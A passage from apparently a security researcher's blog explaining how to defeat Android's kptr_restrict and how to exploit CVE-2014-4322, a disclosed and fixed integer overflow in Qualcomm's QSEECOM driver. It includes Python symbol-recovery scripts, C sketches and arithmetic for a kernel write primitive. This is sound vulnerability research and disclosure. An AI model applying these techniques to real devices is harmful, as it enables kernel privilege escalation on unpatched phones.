Since the service has no "user" or "group" configurations, it is actually executed with the root user-ID and group-ID, which could be quite dangerous...

Luckily, the developers of the service were well aware of the potential security risks of running with such high capabilities, and therefore immediately after starting, the service drops its capabilities by modifying its user-ID, group-ID and capabilities, like so:

In short, the service sets the user and group IDs to those of the shell user, but makes sure that it keeps the CAP_SYSLOG capability explicitly.

Reading on reveals that "dumpstate" actually reads the kernel log using the syslog system call (which it is capable of executing since it has the CAP_SYSLOG capability), and writes the contents read back to the caller. Essentially, this means that within the context of the "adb shell", we can freely read the kernel log simply by executing the "bugreport" program. Nice.

However, this still doesn't solve the problem of getting needed symbols for exploits - since, as mentioned earlier, these symbols should generally be printed using the "%pK" format specifier, which means they would appear "censored" in the kernel log.

Fortunately (for us), most pointers within the kernel are certainly not printed using the special format specifier, but instead use the regular "%p" format, and are therefore left uncensored. This means that the kernel log is typically a treasure trove of useful kernel pointers.

For example, when the kernel boots, the memory map of the kernel's different segments is printed, like so:

Now, assuming there's a single symbol we would like to find, we could simply dump the list of all kernel symbols using the virtual file containing all the symbols - /proc/kallsyms. When kptr_restrict is enabled, the list returned by kallsyms is censored (since it is printed using "%pK"), and therefore won't show any kernel pointers.

Censored symbols from kallsyms

However, the symbols returned by kallsyms are ordered by their addresses, even if those addresses aren't shown. Moreover, this task is made easier due to the fact that each segment is prefixed and postfixed by specially named marker symbols:

Segment Name	Start Marker	End Marker
.text	_text	_etext
.init	__init_begin	__init_end
.data	_sdata	_edata
.bss	__bss_start	__bss_end

We can then use this list to deduce the location of different symbols by simply counting the number of symbols from the start or end marker to our wanted symbol, while adding up the sizes of each of the symbols encountered.
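The counting approach can be sketched as follows. The sketch assumes the following: the censored kallsyms output is in its usual "ADDRESS TYPE NAME" form; the start marker's real address is known (for instance, from the memory map printed at boot); and sizes for the intervening symbols are available from some other source, such as a build of the same kernel. Where those sizes come from is left open. Alignment padding between symbols is ignored, so the result is an estimate that may need correcting. Duplicate names, which are common for static functions, resolve to the first match. The function names are hypothetical.

```python
def parse_kallsyms(text):
    """Return symbol names in file order from (possibly censored) kallsyms text."""
    names = []
    for line in text.splitlines():
        parts = line.split()  # ADDRESS TYPE NAME [MODULE]
        if len(parts) >= 3:
            names.append(parts[2])
    return names


def deduce_address(names, sizes, marker, marker_addr, target):
    """Estimate target's address by walking forward from a marker of known address.

    `sizes` maps symbol name -> size in bytes; unknown names count as 0.
    """
    i, j = names.index(marker), names.index(target)
    if j < i:
        raise ValueError("target precedes the marker; walk back from an end marker")
    return marker_addr + sum(sizes.get(name, 0) for name in names[i:j])
```

Walking backwards from an end marker such as _etext works the same way, subtracting sizes instead of adding them.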

Another technique would be to cause a wanted kernel pointer to be written to the kernel log. For example, on Qualcomm-based devices (based on the "msm" kernel), whenever the video device is opened, the kernel virtual address of the video device is written to the kernel log:

msm_vidc_open leaks the pointer to the kernel log

Method #2 - Retrieving the kernel symbols statically

Why use this method?

In many cases, although the device itself is accessible, it may be heavily locked - for example, in extreme cases, adb access may be disabled (however poorly), which would complicate the usage of the first method (unless we manage to gain shell access). In this case, we may wish to build the complete list of kernel symbols from the kernel image itself, statically, without interacting directly with the device.

Also, since KASLR (Kernel Address Space Layout Randomization) is currently still unused in Android devices, there is no need to consider any kind of runtime modification to the location of the symbols present in the kernel image. This means that the kernel image must contain all the information needed to build the complete list of symbols, including their addresses, exactly as they would appear on a real "live" device.

How do I get a kernel image?

Assuming you have full access to a live device, you could read the kernel image directly from the MMC, via /dev/block. However, in most cases reading the MMC blocks directly requires root permissions, which would make this method moot, since with root access we could already disable kptr_restrict.

The more reasonable path to obtaining the kernel image is to simply download the firmware file for your particular device and unpack it. There are many tools which enable firmware unpacking for different devices (for example, I wrote a script to unpack the Nexus 5's bootloader), and they are typically a Google search away.

Just one word of caution - make sure you download the exact kernel image matching the kernel on your device. You can find the running kernel's version by simply running "uname -a":

I have the image - now what?

In order to understand how to extract the full symbol list from a kernel image, we must first inspect the way in which a kernel image is built. Looking over the code reveals that, as part of the build process, a special program is used to emit the needed symbols into the kernel's image in a special format. This program receives the symbol map containing the location of each kernel symbol in the kernel's virtual address space, and outputs an assembly file containing the compressed symbol table, which is then assembled into the resulting kernel image.

This means that all we need to do in order to rebuild this table from a raw kernel binary is to understand the exact format in which this symbol table is written. However, for a normally compiled kernel with no additional symbols, this turns out to be a little tricky.

Since the labels written by the script are not visible in the resulting kernel binary, the first thing we'd have to solve is how to find the beginning of the symbol table within the binary. Luckily, the solution turns out to be pretty simple - remember when we previously had a look at the symbol table from kallsyms? The first two symbols were marker symbols pointing to the beginning of the kernel's text segment. Since the kernel's code is loaded at a known address (typically, 0xC0008000), we can search for this value appearing at least twice consecutively within the binary, and attempt to parse the symbol table's structure starting at that address.

Going over the symbol table itself reveals that it is terminated by a NULL address. Then, immediately following the symbol table, the actual number of symbols is written, which means we can easily verify that the table is well-formed.
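Following the layout described above, locating and validating the table can be sketched in Python. The sketch assumes a 32-bit little-endian kernel loaded at 0xC0008000. It tolerates zero padding between the NULL terminator and the symbol count. It also checks that the addresses are sorted, since kallsyms lists symbols in address order. The function names are hypothetical, and real images may need further adjustments.

```python
import struct

KERNEL_TEXT = 0xC0008000  # typical _text address on 32-bit ARM kernels


def _parse_table_at(blob, off):
    """Read addresses up to a NULL word and validate the trailing count.

    Returns the list of addresses, or None if this isn't a plausible table.
    """
    addrs = []
    while off + 4 <= len(blob):
        (value,) = struct.unpack_from("<I", blob, off)
        off += 4
        if value == 0:
            break
        addrs.append(value)
    else:
        return None  # ran off the end without finding the terminator
    # Skip any zero padding between the terminator and the symbol count.
    while off + 4 <= len(blob) and struct.unpack_from("<I", blob, off)[0] == 0:
        off += 4
    if off + 4 > len(blob):
        return None
    (count,) = struct.unpack_from("<I", blob, off)
    if count != len(addrs):
        return None
    # kallsyms is ordered by address, so a real table must be sorted.
    if any(a > b for a, b in zip(addrs, addrs[1:])):
        return None
    return addrs


def find_symbol_table(blob, text_addr=KERNEL_TEXT):
    """Return (offset, addresses) of the first plausible table, or None."""
    needle = struct.pack("<II", text_addr, text_addr)  # _text, stext, ...
    pos = blob.find(needle)
    while pos != -1:
        if pos % 4 == 0:  # the table is word-aligned
            addrs = _parse_table_at(blob, pos)
            if addrs is not None:
                return pos, addrs
        pos = blob.find(needle, pos + 1)
    return None
```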

Then, two tables of "markers" and "symbols" are written into the file. This is done in order to compress the size of the symbols within the table, and by doing so reduce the size of the kernel binary. The compression maps the 256 most used substrings (which are called tokens) into single byte values. Then, each symbol's name is compressed into a Pascal-style string of bytes (meaning, a byte marking the length of the string, followed by the actual bytes). Each byte in the compressed name maps to a single token, which in turn corresponds to a single "most commonly used" substring. Putting it together, it looks like this:

According to kernel developers, this usually produces a compression ratio of about 50%.
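Decoding the names can be sketched as follows. Following the description above, each entry is a length byte followed by that many token indices. The token table is assumed to be stored as 256 NUL-terminated strings placed back to back, which is our understanding of what the kernel's scripts/kallsyms.c emits. Locating that table and the names table inside the binary is not shown, and the function names are hypothetical.

```python
def parse_token_table(table_blob):
    """Split the token table: 256 NUL-terminated strings stored back to back."""
    tokens = table_blob.split(b"\x00")[:256]
    if len(tokens) != 256:
        raise ValueError("expected 256 tokens")
    return [t.decode("ascii") for t in tokens]


def decompress_names(names_blob, tokens, count):
    """Expand `count` length-prefixed entries; each byte selects one token."""
    names, off = [], 0
    for _ in range(count):
        length = names_blob[off]
        chunk = names_blob[off + 1:off + 1 + length]
        if len(chunk) != length:
            raise ValueError("truncated names table")
        names.append("".join(tokens[b] for b in chunk))
        off += 1 + length
    return names
```

If the expanded names begin with the symbol's type letter, as they do in the kernel's own tables, name[0] and name[1:] separate the type from the name.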

I've written a python script which, given a raw kernel binary, extracts the full symbol table from the binary, in the exact same format as they are written within kallsyms. You can find it here. Please let me know if you find the script useful!

Method #3 - Finding information disclosures within the kernel

This is the "classical" method which is commonly used in order to bypass the restrictions imposed by kptr_restrict. For a remote attacker wishing to target a wide variety of devices, it is quite often the best choice, since:

The first method typically requires shell access to the device, in order to execute the "bugreport" service
The second method requires you to obtain the kernel image, which could be tiresome to do for a very wide variety of devices

Sadly, it appears that kernel developers are far less aware of the possible risks of leaking kernel pointers than they are of other (e.g., memory corruption) vulnerabilities.

As a result, finding a kernel pointer leak is usually a very short and simple task. To prove this point, after poking around on a live device for five minutes, I came across such a leak, which is accessible from any context.

Whenever a socket is opened within Android, it is tagged using a netfilter driver called "qtaguid". This driver accounts for all the data sent or received by every socket (and tag), and allows some restrictions to be placed on sockets, based on the tag assigned to them. Android uses this feature in order to account for data usage by the device. The actual per-process breakdown is done by assigning each process a specific tag, and monitoring the data used by the process based on that tag.

The driver also exposes a control interface, with which a user can query the current sockets and their tags, along with the user-ID and process-ID from which the socket has been opened. This control interface is facilitated by a world-accessible file, under /proc/net/xt_qtaguid/ctrl.

However, reading this file reveals that it contains the kernel virtual address of each socket, completely uncensored:

Looking at the source code for the virtual file's "read" implementation reveals that the address is written without using the special "%pK" format specifier:
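Extracting the leaked addresses is a matter of parsing that file. The sketch below assumes each socket line contains fields of the form sock=<hex>, uid=<n> and pid=<n>. The exact line format varies between kernel versions, so treat the regular expressions as assumptions to check against your device. The helper names are hypothetical.

```python
import re

# Assumed field shapes; verify against the target's /proc/net/xt_qtaguid/ctrl.
SOCK_RE = re.compile(r"sock=(?:0x)?([0-9a-fA-F]+)")
UID_RE = re.compile(r"uid=(\d+)")
PID_RE = re.compile(r"pid=(\d+)")


def leaked_sockets(ctrl_text):
    """Return (sock_address, uid, pid) per socket line; uid/pid are None if absent."""
    results = []
    for line in ctrl_text.splitlines():
        m = SOCK_RE.search(line)
        if not m:
            continue
        uid = UID_RE.search(line)
        pid = PID_RE.search(line)
        results.append((int(m.group(1), 16),
                        int(uid.group(1)) if uid else None,
                        int(pid.group(1)) if pid else None))
    return results


def read_ctrl(path="/proc/net/xt_qtaguid/ctrl"):
    """Read the world-readable control file (only present on qtaguid kernels)."""
    with open(path) as f:
        return f.read()
```

To find a socket you have just opened and tagged, you could filter leaked_sockets(read_ctrl()) on os.getpid(), assuming the pid field records the tagging process.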

For those interested - the pointer written is that of the "sock" structure, which is the kernel structure holding a pointer to the actual "socket" structure, which in turn points to the table of function pointers implementing the socket's operations.

This means that if, for example, we have a vulnerability that allows us to overwrite a specific kernel address (like the vulnerability presented in the previous blog post), we could simply:

Open a socket and tag it with "qtaguid"
Look for the socket's address within /proc/net/xt_qtaguid/ctrl
Overwrite the pointer to the "socket" structure to an address within our address-space
Populate the overwritten address with a dummy "socket" structure containing fully controlled function pointers
Perform any operation on the socket (like closing it), in order to cause the kernel to execute our own code

Summing it all up

Just like any other mitigation, kptr_restrict adds a layer of defence which can sometimes slow down an attacker, but is generally not a show-stopper for anyone determined enough. However, unlike most other mitigations, kptr_restrict requires the cooperation of kernel developers to be effective. Right now, things aren't so great. Hopefully this changes :)

Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

2015-08-16T03:07:00.000+03:00

In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which enables arbitrary code execution within the kernel.

The vulnerability affected all devices based on Qualcomm chipsets (that is, based on the "msm" kernel) since February 2012.

I'd like to point out that I've responsibly disclosed this issue to Qualcomm, and they've been great as usual, and fixed the issue pretty quickly (see "Timeline" below). Those of you who are interested in the fix should definitely check out the link above.

Where are we at?

Continuing our journey of getting from zero permissions to TrustZone code execution; after recently completing the task of getting to TrustZone from the Linux kernel, we are now looking for a way to gain code execution within the Linux kernel.

However, as you will see shortly, the vulnerability presented in this post requires some permissions to exploit, namely, it can be exploited from within a process called "mediaserver". This means that it still doesn't complete our journey, and so the next few blog posts will be dedicated to completing the exploit chain, by gaining code execution in mediaserver from zero permissions.

Let's go bug hunting

Since we would like to attack the Linux kernel, it stands to reason that we would take a look at all the drivers which are accessible to "underprivileged" Android users. First, let's take a look at all the drivers which are world accessible (under "/dev"):

Unfortunately, this list is rather short - actually, these drivers are all "generic" Android drivers, which are present on all devices (with the exception of "kgsl-3d0"), and have therefore been the subject of quite a lot of prior research.

After spending a while looking at each of these drivers, it became apparent that a more effective strategy would be to cast a wider net by expanding the set of drivers to be researched, even if interacting with them requires some permissions. Then, once a vulnerability is found, we would simply need one more vulnerability in order to get from zero permissions to TrustZone.

One interesting candidate for research is the "qseecom" driver. For those of you who read the first blog post, we've already mentioned this driver before. This is the driver responsible for allowing Android code to interact with the TrustZone kernel, albeit using only a well defined set of commands.

So why is this driver interesting? For starters, it ties in well with the previous blog posts, and everybody loves continuity :) That aside, this driver has quite a large and fairly complicated implementation, which, following the previous posts, we are sufficiently qualified to understand and follow.

Most importantly, taking a look at the permissions needed to interact with the driver, reveals that we must either be running with the "system" user-ID which is a very high requirement, or we must belong to the group called "drmrpc".

However, searching for the "drmrpc" group within all the processes on the system, reveals that the following processes are members of the group:

surfaceflinger (running with "system" user-ID)
drmserver (running with "drm" user-ID)
mediaserver (running with "media" user-ID)
keystore (running with "keystore" user-ID)

But that's not all! Within the Linux kernel, each process has a flag named "dumpable", which controls whether or not the process can be attached to using ptrace. Whenever a process changes its permissions by executing "setuid" or "setgid", the flag is automatically cleared by the kernel to indicate that the process cannot be attached to.

While the "surfaceflinger" and "drmserver" processes modify their user-IDs during runtime, and by doing so protect themselves from foreign "ptrace" attachments, the "mediaserver" and "keystore" processes do not.

This is interesting since attaching to a process via "ptrace" allows full control of the process's memory, and therefore enables code execution within that process. As a result, any process running with the same user-ID as one of these two processes can take control of them and by doing so, may access the "qseecom" driver.
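For a quick look at the flag from inside a process, Linux exposes it through prctl(PR_GET_DUMPABLE). The sketch below calls prctl via ctypes. It only reports the calling process's own flag (Linux only) and does not by itself show anything about mediaserver or keystore. A value of 0 means other processes need CAP_SYS_PTRACE to attach to it.

```python
import ctypes
import os

PR_GET_DUMPABLE = 3  # from <linux/prctl.h>


def get_dumpable():
    """Return the calling process's dumpable flag (0 means not dumpable)."""
    libc = ctypes.CDLL(None, use_errno=True)
    value = libc.prctl(PR_GET_DUMPABLE, 0, 0, 0, 0)
    if value < 0:
        err = ctypes.get_errno()
        raise OSError(err, os.strerror(err))
    return value
```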

Summing it up, this means that in order to successfully access the "qseecom" driver, an attacker must only satisfy one of the following conditions:

Gain execution within one of "surfaceflinger", "drmserver", "mediaserver" or "keystore"
Run within a process with the "system", "drm" or "keystore" user-ID
Run within a process with the "drmrpc" group-ID

Tricksy Hobbitses

Before we start inspecting the driver's code, we should first recall the (mis)trust relationship between user-space and kernel-space.

Since drivers deal with user input, they must take extreme caution to never trust user-supplied data, and always verify it extensively - all arguments passed in by the user should be considered by the kernel as "tainted". While this may sound obvious, it's a really important issue that is often overlooked by kernel developers.

In order to stop kernel developers from making these kinds of mistakes, some mechanisms were introduced into the kernel's code which help static analysis tools detect such attempts.

This is facilitated by marking variables which point to memory within the user's virtual address space as such, by using the "__user" macro.

When the kernel is checked with the "sparse" static analyzer, this macro expands to mark the variable with the "noderef" attribute (in a regular compiler build it expands to nothing). The attribute tags the pointer as one that must not be directly dereferenced, and if an attempt is made to dereference such a pointer directly, the checker flags it.

Instead, whenever the kernel wishes to either read from or write to the pointer's location, it must do so using specially crafted kernel functions which make sure that the location pointed to actually resides within the user's address space (and not within any memory address belonging to the kernel).

Getting to know QSEECOM

Drivers come in many shapes and sizes, and can be interacted with using quite a wide variety of functions, each with its own pitfalls and common mistakes.

When character devices are registered within the kernel, they must provide a structure containing pointers to the device's implementation for each of the aforementioned functions, determining how it interacts with the system.

This means that an initial step in mapping out the attack surface for this driver would be to take a look at the functions registered by it:

In the case of the QSEECOM driver, the only "interesting" function implemented is the "ioctl" function call. Generally, character devices can be interacted with just as any other file on the system - they can be opened, read from, written to, etc. However, when an operation doesn't neatly map into one of the "normal" file operations, it can be implemented within a special function called "IOCTL" (Input/Output Control).

IOCTLs are called using two arguments:

The "command" to be executed
The "argument" to be supplied to that function

The complete list of supported "commands" can be deduced by reading the source code of the IOCTL's implementation.

Having said that, let's take a look at the different commands supported by the "qseecom_ioctl" function. At first glance, the driver seems to support quite a large range of commands, such as:

Sending command requests to TrustZone
Loading QSEE TrustZone applications
Provisioning different encryption keys
Setting memory parameters for the client of the driver

Setting Memory Parameters

In order to allow the user to send large requests to or receive large responses from the TrustZone kernel, the QSEECOM driver exposes an IOCTL command which enables the user to set up their "memory parameters".

In order to share a large chunk of memory with the kernel, the user first allocates a contiguous physical chunk of memory by using the "ion" driver.

We won't go into detail about the "ion" driver, but here's the gist of it: it is an Android driver which is used to allocate contiguous physical memory and expose it to the user by means of a file descriptor. After receiving a file descriptor, the user may map it to any chosen virtual address and use it as they please. This makes it a convenient way to share memory, since anyone in possession of the file descriptor may map it to any address within their own virtual address space, independently of one another.

The "ion" driver also supports different kinds of pools from which memory can be allocated, and a wide variety of flags - for those interested, you can read much more about "ion" and how it works, here.

In the case of QSEECOM, three parameters are used to configure the user's memory parameters:

virt_sb_base - The virtual address at which the user decided to map the ION allocated chunk
sb_len - The length of the shared buffer used
ifd_data_fd - The "ion" file descriptor corresponding to the allocated chunk

The driver actually verifies that the whole range from "virt_sb_base" to "virt_sb_base + sb_len" is accessible to the user (and doesn't, for example, overlap with the kernel's memory).

Then, after performing the needed validations, the driver maps the ION buffer to a kernel-space virtual address, and stores all the memory parameters in an internal data structure, from which they can later be retrieved whenever the user performs additional IOCTL calls:

Note that four different parameters are stored here:

The kernel-space virtual address at which the ION buffer is mapped
The actual physical address of the ION buffer
The user-space virtual address at which the ION buffer is mapped
The length of the shared buffer

Since this is quite a lot to remember (and it's only going to get worse :) ), let's start mapping out the current state of the virtual address space:

QSEECOM_IOCTL_SEND_MODFD_CMD_REQ

After going over the code for each of the different supported commands, one command in particular seemed to stick out as a prime candidate for exploitation: QSEECOM_IOCTL_SEND_MODFD_CMD_REQ.

This command is used in order to request the driver to send a command to TrustZone using user-provided buffers. As we know, any interaction of the kernel with user-provided data, let alone user-provided memory addresses, is potentially dangerous.

After some boilerplate code and internal housekeeping, the actual function in charge of handling this particular IOCTL command is called - "qseecom_send_modfd_command".

The function first safely copies the IOCTL argument supplied by the user into a local structure, which looks like this:

The "cmd_req_buf" and "cmd_req_len" fields define the request buffer for the command to be sent, and similarly, "resp_buf" and "resp_len" define the response buffer to which the result should be written.

Now stop! Do you notice anything fishy in the structure above?

For starters, there are two pointers within this structure which are not marked as "tainted" in any way (not marked as "__user"), which means nothing prevents the driver from mistakenly dereferencing them directly later on.

What comes next, however, is quite an intimidating wall of verifications which are meant to make sure that the given arguments are, in fact, valid. It seems as though Qualcomm win this round...

Or do they?

Well, let's look at each of the validations performed:

First, the function makes sure that the request and response buffers are not NULL.
Next, the function makes sure that both the request and response buffers are within the range of the shared buffer discussed earlier.
Then, the function makes sure that the request buffer's length is larger than zero, and that both the request and the response size do not exceed the shared buffer's length.
Lastly, for each file descriptor passed, the function validates that the command buffer offset does not exceed the length of the command buffer.
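The four checks can be sketched as follows. This is a reconstruction from the description above, not the driver's code. The structure is modelled on the fields named in this post, and 32-bit user addresses are represented as "uint32_t" (the real structure holds raw pointers). Three choices are assumptions: "MAX_ION_FD" being 4, treating only slots with a positive fd as in use, and reading "within the range" as "starts inside the shared buffer".

```c
#include <stdint.h>

#define MAX_ION_FD 4  /* assumed number of fd slots */

struct ion_fd_info {
    int32_t fd;
    uint32_t cmd_buf_offset;  /* offset into the request buffer */
};

struct modfd_req {
    uint32_t cmd_req_buf;  /* user VA of the request buffer */
    uint32_t cmd_req_len;
    uint32_t resp_buf;     /* user VA of the response buffer */
    uint32_t resp_len;
    struct ion_fd_info ifd_data[MAX_ION_FD];
};

/* Returns 1 if the request passes the checks described above. */
static int modfd_req_valid(const struct modfd_req *r,
                           uint32_t sb_base, uint32_t sb_len)
{
    uint64_t sb_end = (uint64_t)sb_base + sb_len;

    /* 1. Neither buffer may be NULL. */
    if (r->cmd_req_buf == 0 || r->resp_buf == 0)
        return 0;
    /* 2. Both buffers must start inside the (claimed) shared buffer. */
    if (r->cmd_req_buf < sb_base || r->cmd_req_buf >= sb_end)
        return 0;
    if (r->resp_buf < sb_base || r->resp_buf >= sb_end)
        return 0;
    /* 3. Non-empty request; neither length may exceed the shared buffer. */
    if (r->cmd_req_len == 0 || r->cmd_req_len > sb_len || r->resp_len > sb_len)
        return 0;
    /* 4. Each fd's offset must not exceed the request length. */
    for (int i = 0; i < MAX_ION_FD; i++)
        if (r->ifd_data[i].fd > 0 &&
            r->ifd_data[i].cmd_buf_offset > r->cmd_req_len)
            return 0;
    return 1;
}
```

For example, take a shared buffer at 0x10000000 with a claimed length of 0x80000000. A request at 0x8FFFF000 with length 0x80000000 and an fd offset of 0x7FFFF000 passes every check. Yet 0x8FFFF000 + 0x7FFFF000 = 0x10FFFE000 no longer fits in 32 bits.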

Before even attempting to scale this wall of verifications, let's first see what's on the other side of it.

After performing all these validations, the function goes on to convert the request and response buffers from user virtual addresses to kernel virtual addresses:

Where the actual conversion taking place looks like so:

This simply amounts to taking the offset of the given virtual address from the beginning of the user-space virtual address of the shared buffer, and adding it to the kernel-space virtual address of the shared buffer. This is because, as mentioned earlier, the kernel maps the ION buffer to a kernel-space virtual address which is unrelated to the user-space virtual address to which the user mapped the buffer. So before the kernel can interact with any pointer within the shared buffer, it must first convert the address to a virtual address within its own address space.
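As a rough sketch, the conversion amounts to the following. The structure and function names are hypothetical, modelled on the four stored parameters listed earlier. The code uses "uint32_t" arithmetic so that the subtraction and addition wrap modulo 2^32, as they would on the 32-bit target.

```c
#include <stdint.h>

/* Hypothetical per-client state holding the stored memory parameters. */
struct sb_params {
    uint32_t sb_virt;            /* kernel VA of the ION mapping */
    uint32_t sb_phys;            /* physical address of the ION buffer */
    uint32_t user_virt_sb_base;  /* user VA claimed by the client */
    uint32_t sb_length;          /* length claimed by the client */
};

/* Same offset from the start of the buffer, different base.
 * Unsigned 32-bit arithmetic wraps modulo 2^32. */
static uint32_t uvirt_to_kvirt(const struct sb_params *p, uint32_t uvirt)
{
    return p->sb_virt + (uvirt - p->user_virt_sb_base);
}
```

Nothing here checks that the result still lies inside the kernel's mapping. The conversion trusts that the earlier validations did their job.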

What comes next, however, is extremely interesting! The driver passes on the request and response buffers, which should now reside within kernel-space, to an internal function called "__qseecom_update_cmd_buf" - and therein lies the holy grail! The function actually writes data to the converted kernel-space address of the request buffer.

We'll expand more on the exact nature of the data written later on, but hopefully by now you're convinced that if we are able to bypass the verifications above while still maintaining control of the final kernel-space address of the request buffer, we would achieve a kernel write primitive, which seems quite tempting.

"Bring down this wall!"

First, let's start by mapping out the locations of the request and response buffers within the virtual address space:

Now, as we already know, when setting the memory parameters, the buffer starting at "virt_sb_base" and ending at "virt_sb_base + sb_len" must reside entirely within user-space. This is facilitated by the following check:

Also, the verifications above make sure that both the "cmd_req_buf" and "resp_buf" pointers are within the user-space virtual address range of the shared buffer.

However, what would happen if we were to map a huge shared buffer, one so large that it cannot be contained within kernel space? Well, a safe assumption might be that when we'd attempt to set the memory parameters for this buffer, the request would fail, since the kernel will not be able to map the buffer into its virtual address space.

Luckily, though, the IOCTL with which the memory parameters are set only uses the user-provided buffer length in order to verify that the user-space range of the shared buffer is accessible by the user (see the access check above). However, when it actually maps the buffer to its own address-space, it does so by simply using the ION file descriptor, without verifying that the buffer's actual length equals the one provided by the user.
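A simplified model of the flaw might look like this. The function names, the "ion_size" parameter (standing in for the real size of the buffer behind the fd) and "USER_LIMIT" are hypothetical. The stricter variant only illustrates the missing check. It is not Qualcomm's actual fix.

```c
#include <stdint.h>

#define USER_LIMIT 0xC0000000ULL  /* assumed end of user space */

/* The claimed length is only used for the user-space range check;
 * the real size of the ION buffer behind the fd is never compared. */
static int set_mem_param_flawed(uint32_t virt_sb_base, uint32_t sb_len,
                                uint32_t ion_size)
{
    (void)ion_size;  /* never consulted */
    return (uint64_t)virt_sb_base + sb_len <= USER_LIMIT;
}

/* Illustrative stricter variant: also reject lengths larger than the
 * buffer that actually backs the mapping. */
static int set_mem_param_strict(uint32_t virt_sb_base, uint32_t sb_len,
                                uint32_t ion_size)
{
    return (uint64_t)virt_sb_base + sb_len <= USER_LIMIT && sb_len <= ion_size;
}
```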

This means we could allocate a small ION buffer, and pass it to QSEECOM while claiming it actually corresponds to a huge area. As long as the entire area lies within user-space and is write-accessible to the user, the driver will happily accept these parameters and store them for us. But is this feasible? After all, we can't really allocate such a huge chunk of memory within user-space, since there's just not enough physical memory to satisfy such a request. What we could do, however, is reserve this memory area by using mmap. Physical pages for such a mapping are not allocated until they are actually written to, so we can freely map a huge area for the duration of the validation performed above, then unmap it once the driver is satisfied that the area is indeed writeable.
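Reserving such an area could be sketched with standard Linux "mmap" flags as below. The exploit described here places the mapping at 0x10000000. This sketch instead lets the kernel pick the address and takes the size as a parameter. Both "reserve_area" and "release_area" are illustrative helpers, not the exploit's code.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <sys/mman.h>

/* Reserve a large, writable, anonymous region without committing physical
 * memory: pages are only allocated on first touch. MAP_NORESERVE also
 * asks the kernel not to reserve swap space for it. */
static void *reserve_area(size_t size)
{
    void *p = mmap(NULL, size, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_NORESERVE, -1, 0);
    return p == MAP_FAILED ? NULL : p;
}

/* Drop the reservation once the driver has accepted the parameters. */
static int release_area(void *p, size_t size)
{
    return munmap(p, size);
}
```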

From now on, let's assume we map the fake shared buffer at the virtual address 0x10000000 and the mapping size is 0x80000000.

Recall that if the command and response buffers are deemed valid, they are converted to the corresponding kernel-space virtual addresses, and the converted request buffer is then written to at the given offset. Putting it all together, we are left with the following actual write destination:

dest_addr = sb_virt - user_virt_sb_base + cmd_req_buf + cmd_buf_offset

Can you spot the mistake in the calculation above? Here it goes -

Since the kernel believes the shared buffer is huge, this means that the "cmd_req_buf" may point to any address within that range, and in our case, any address within the range [0x10000000, 0x90000000]. It also means that the "cmd_buf_offset" can be as large as 0x80000000, which is the fake size of the shared buffer.

Adding two such large numbers can easily overflow the 32-bit calculation above, which means that the resulting address may not be within the kernel's shared buffer after all!
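The wraparound is easy to reproduce with 32-bit unsigned arithmetic. The "write_dest" helper below is hypothetical and simply evaluates the destination formula. The "sb_virt" value in the example is made up.

```c
#include <stdint.h>

/* Destination computed in 32-bit arithmetic. Inputs that each pass the
 * range checks can still make the sum wrap past 0xFFFFFFFF. */
static uint32_t write_dest(uint32_t sb_virt, uint32_t user_base,
                           uint32_t cmd_req_buf, uint32_t cmd_buf_offset)
{
    return sb_virt - user_base + cmd_req_buf + cmd_buf_offset;
}
```

For instance, take sb_virt = 0xE0000000, a base of 0x10000000, cmd_req_buf = 0x80000000 and cmd_buf_offset = 0x40000000. Every value passes the range checks, but the destination comes out as 0x90000000, a user-space address.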

(Before you read on, you may want to try to work out the needed values on your own.)

Finding the kernel's shared buffer

As you can see in the calculation above, the location of the kernel's shared buffer is still unknown to us. This is because it is mapped during runtime, and this information is not exposed to the user in any way. However, this doesn't mean we can't find it on our own.

If we were to set the "cmd_buf_offset" to zero, that would mean that the destination write address for the kernel would be:

sb_virt - 0x10000000 + cmd_req_buf + 0x0

Now, since we know the "sb_virt" address is actually within the kernel's heap, it must be within the kernel's memory range (that is, at least 0xC0000000), so "sb_virt - 0x10000000" is at least 0xB0000000. This means that for values of "cmd_req_buf" that are larger than (0xFFFFFFFF - 0xB0000000), that is, at least 0x50000000, the calculation above would surely overflow, resulting in a low user-space address.

This turns out to be really helpful. We can now allocate a sterile "dropzone" within the lower range of addresses in user-space, and fill it with a single known value.

Then, after we trigger the driver's write primitive using the parameters described above, we could inspect the dropzone and find out where it has been "disturbed", that is, where a value has been changed. Since we know exactly one overflow happened in the destination address calculation, we can simply reverse the calculation (adding back 0xFFFFFFFF + 1) to find the original value of "sb_virt".
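Both steps of this probing stage might be sketched as follows. The fill pattern, "find_disturbed" and "recover_sb_virt" are hypothetical. The recovery assumes "cmd_buf_offset" was zero, as above. In practice, the disturbed address would be the dropzone's base plus four times the returned index.

```c
#include <stddef.h>
#include <stdint.h>

#define DROPZONE_FILL 0x41414141u  /* hypothetical fill pattern */

/* Index of the first DWORD that no longer holds the fill value,
 * or -1 if the dropzone is untouched. */
static long find_disturbed(const uint32_t *zone, size_t n_dwords)
{
    for (size_t i = 0; i < n_dwords; i++)
        if (zone[i] != DROPZONE_FILL)
            return (long)i;
    return -1;
}

/* Undo dest = sb_virt - user_base + cmd_req_buf, which wrapped once
 * past 2^32. Unsigned 32-bit arithmetic re-adds the 2^32 implicitly. */
static uint32_t recover_sb_virt(uint32_t dest, uint32_t user_base,
                                uint32_t cmd_req_buf)
{
    return dest + user_base - cmd_req_buf;
}
```

For example, if sb_virt were 0xE1234000 and cmd_req_buf 0x60000000, the write would land at 0x31234000. recover_sb_virt(0x31234000, 0x10000000, 0x60000000) then yields 0xE1234000 again.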

Creating a controlled write primitive

Now that we know the exact address of "sb_virt", we are free to manipulate the arguments accordingly in order to control the destination address freely. Recall that the destination address is structured like so:

Now, since all the arguments are known, and the sum of "cmd_req_buf" and "cmd_buf_offset" can exceed 0xFFFFFFFF, we can simply modify any address following sb_virt by setting the following values:

user_virt_sb_base = 0x10000000
cmd_req_buf + cmd_buf_offset = (0xFFFFFFFF + 1) + 0x10000000 + wanted_offset

This means that the destination write address would be:

dest_addr = sb_virt - user_virt_sb_base + cmd_req_buf + cmd_buf_offset

Substituting the variables with the values above:

dest_addr = sb_virt - 0x10000000 + (0xFFFFFFFF + 1) + 0x10000000 + wanted_offset

Which equals:

dest_addr = sb_virt + (0xFFFFFFFF + 1) + wanted_offset

But since adding 0xFFFFFFFF + 1 (that is, 2^32) wraps around to the original value in 32-bit arithmetic, we are left with:

dest_addr = sb_virt + wanted_offset

